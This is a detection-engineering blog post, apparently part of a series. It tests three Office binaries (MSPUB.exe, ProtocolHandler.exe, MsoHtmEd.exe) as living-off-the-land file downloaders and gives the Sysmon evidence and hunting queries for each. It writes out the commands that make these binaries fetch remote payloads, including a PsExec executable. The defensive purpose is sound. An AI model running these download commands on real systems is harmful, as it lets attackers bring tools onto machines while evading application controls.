LOLBAS Detection Serie [2] — Mspub.exe + ProtocolHandler.exe + MsoHtmEd.exe
The LOLBAS serie : https://medium.com/@mthcht/list/lolbas-843ba9de6810
This time, I’ve selected three LOLbins associated with Microsoft Office. Let’s test and examine each one to determine what we can detect!
MSPUB.exe
LOL technique for MSPUB.exe
Ref LOLBAS: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/
C_h4ck_0 on twitter found a way to download arbitrary files with MSPUB.exe by using the following command:mspub.exe https://example.com/payload
Categorized: T1105: Ingress Tool Transfer
Testing and Detection
We will use this payload test on pastebin: https://pastebin.com/raw/Z2JNzQ0z
I execute the command (with my version of Office):
"C:\Program Files\Microsoft Office\Office16\MSPUB.EXE" https://pastebin.com/raw/Z2JNzQ0z
MSPUB is executed, and the content of the pastebin is shown!
Using procmon, we can see that MSPUB.exe is also creating a file (Sysmon EventID 11) with the content of our pastebin in the InetCache folder: %LOCALAPPDATA%\Microsoft\Windows\INetCache\Content.MSO\<random-8-characters>.txt
and not in the suggested folder on the lolbas page ‘%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE’
We can have different location with some version of Office so i suggest to collect the root folder %LOCALAPPDATA%\Microsoft\Windows\INetCache\, it’s a valuable DIFR artifact and will allow us to retrieve the payload (FYI, a prefetch file is also created under C:\Windows\Prefetch\MSPUB.EXE-<random_nubers>.pf)
Sysmon EventID 22:
DNS resolved for pastebin.com
RuleName: -
UtcTime: 2023-08-22 14:06:50.529
ProcessGuid: {a65d1ee1-c0f2-64e4-be22-020000005200}
ProcessId: 5816
QueryName: pastebin.com
QueryStatus: 0
QueryResults: ::ffff:172.67.34.170;::ffff:104.20.67.143;::ffff:104.20.68.143;
Image: C:\Program Files\Microsoft Office\Office16\MSPUB.EXE
User: mthcht Sysmon Event ID 3:
External connection from MSPUB.exe
Network connection detected:
RuleName: -
UtcTime: 2023-08-22 14:06:50.918
ProcessGuid: {a64e1ef2-dc0f2-26e4-ce24-040000006200}
ProcessId: 5816
Image: C:\Program Files\Microsoft Office\Office16\MSPUB.EXE
User: mthcht
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.13.37
SourceHostname: mthchtlab.lan.thunting.io
SourcePort: 1190
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 104.20.68.143
DestinationHostname: -
DestinationPort: 443
DestinationPortName: httpsSysmon EventID 1:
Commandline execution
RuleName:-
UtcTime: 2023-08-22 14:06:42.699
ProcessGuid: {a64e1ef2-dc0f2-26e4-ce24-040000006200}
ProcessId: 5816
Image: C:\Program Files\Microsoft Office\Office16\MSPUB.EXE
FileVersion: 16.0.5408.1001
Description: Microsoft Publisher
Product: Microsoft Office 2016
Company: Microsoft Corporation
OriginalFileName: MSPUB.EXE
CommandLine: "C:\Program Files\Microsoft Office\Office16\MSPUB.EXE" https://pastebin.com/raw/Z2JNzQ0z
CurrentDirectory: C:\windows\system32\
User: mthcht
LogonGuid: {a25d1ef2-bcaf-24e2-e32c-2f0000000000}
LogonId: 0x2f6ce4
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=78B24B432342B85F47A01AFD0ADFD04757170C72,MD5=80695CC0BBDA3D2E55504F6392AFD2B1,SHA256=61EA4A273F16F442FFB7CC9542BF9EA8F90FD7DC1C2AA501F5BFCE6CDEAD6683,IMPHASH=A11D9C9CB42AF982B4AC18990A3999B8
ParentProcessGuid: {a64d1ee2-c0a6-24e6-a422-020000005200}
ParentProcessId: 14344
ParentImage: "C:\Windows\System32\cmd.exe"
ParentCommandLine: "C:\windows\system32\cmd.exe"
ParentUser: mthchtIn the sigma rule proposed on the LOLBAS page, the command-line detection also searches for the argument ftp:// and indeed, it’s possible to contact an FTP server with the binary. The logs are pretty much the same, but having this information here is valuable because we wouldn’t know it by just looking at the LOLBAS page.
Relevant Hunting searches for MSPUB.exe:
MSPUB.exe requesting external destinations
- External destination IP address contacted by MSPUB.EXE - Sysmon EventID 3 (for triage omit the external IP addresses associated with your company)
- External domain name resolved by MSPUB.exe - Sysmon EventID 22
CommandLine from MSPUB.exe:
- Process name MSPUB.exe with the process command containing either “* http://*”, “* https://*” or ‘* ftp://*’
MSPUB Parent process:
- Parent process of MSPUB.exe is a command interpreter (powershell.exe,cmd.exe,powershell_ise.exe,python.exe…)
ProtocolHandler.exe
LOL technique for ProtocolHandler.exe
Ref LOLBAS: https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/
C_h4ck_0 and reegun21 on twitter found a way to download files without user interaction with ProtocolHandler.exe by using the following command:ProtocolHandler.exe https://example.com/payload
Categorized: T1105: Ingress Tool Transfer
Testing and Detection
ProtocolHandler.exe is usually involved in handling specific protocols used by Office applications
The LOLBAS page describes that the command should launch the default browser and navigate to the specified URL. To download our payload, we’ll select an executable that cannot be opened in the browser. For the test, I’ve chosen https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/_bin/PsExec.exe
I run the following command:
“C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe” https://github.com/mthcht/Purpleteam/raw/main/Simulation/Windows/_bin/PsExec.exe
Here’s the process tree with the commands:
MSEdge browser opened the url and downloaded the file.
The problem is that ProtocolHandler.exe was meant for handling URI scheme based Microsoft Office files but also handles internal references and urls.
Relevant Hunting searches for ProtocolHandler.exe:
No need to analyze further logs, as ProtocolHandler.exe can also be used by Microsoft Office applications for opening remote files, the only relevant detection for this lolbin will be the suspicious parent process relationship and the commandline with the url as the only argument.
Commanline:
- full process command contain “*protocolhandler.exe http*”
Process relationship
1st method (Blacklist):
Establish a list of suspicious parent process we should not see for protocolhandler.exe
- python.exe, cmd.exe, powershell.exe or powershell_ise.exe is the parent process of protocolhandler.exe (Command interpreters as the parent)
2nd method (Baseline):
Establish a list of legitimate suspicious parent process for protocolhandler.exe and hunt the others
- Microsoft Office Executables and others (POWERPNT.exe, EXCEL.exe, OUTLOOK.exe, WINWORD.exe, explorer.exe…)
MsoHtmEd.exe
LOL technique for MsoHtmEd.exe
Ref LOLBAS: https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/
C_h4ck_0 on twitter found a way to download files with MsoHtmEd.exe by using the following command:MsoHtmEd.exe https://example.com/payload
Categorized: T1105: Ingress Tool Transfer
Testing and Detection
MsoHtmEd.exe allows for the editing and handling of HTML content within Office applications like Microsoft Word or Outlook, especially when dealing with email content, it should not be able to download files…
I execute the command:
“C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE” https://github.com/mthcht/Purpleteam/raw/main/Simulation/Windows/_bin/PsExec.exe
My payload is downloaded in %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random-8-caracters>\ and automatically opens with Notepad. We can then access and use the downloaded payload from the INetCache folder.
Relevant Hunting searches for MsoHtmEd.exe:
Process Execution (Sysmon EventID 1) :
CommandLine:
msohtmed.exe with the url argument:
- process_command contain “*msohtmed.exe http*” or “*msohtmed.exe ftp*”
notepad.exe opening a executable file or script in the INetCache folder. process_command contain:
- “*notepad.exe *\AppData\Local\Microsoft\Windows\INetCache\IE\*\*<executable_extension>”
- <executable_extension> could be .exe, .bat .ps1 .cmd .bin .vbs …
Process relationship:
- msohtmed.exe is the parent process of notepad.exe
- parent process of msohtmed.exe is a command interpreter (cmd.exe,powershell.exe,powershell_ise.exe,python.exe…)
- parent process of msohtmed.exe is not a Microsoft Office executable
That’s it ! moving on to the next LOLBAS !
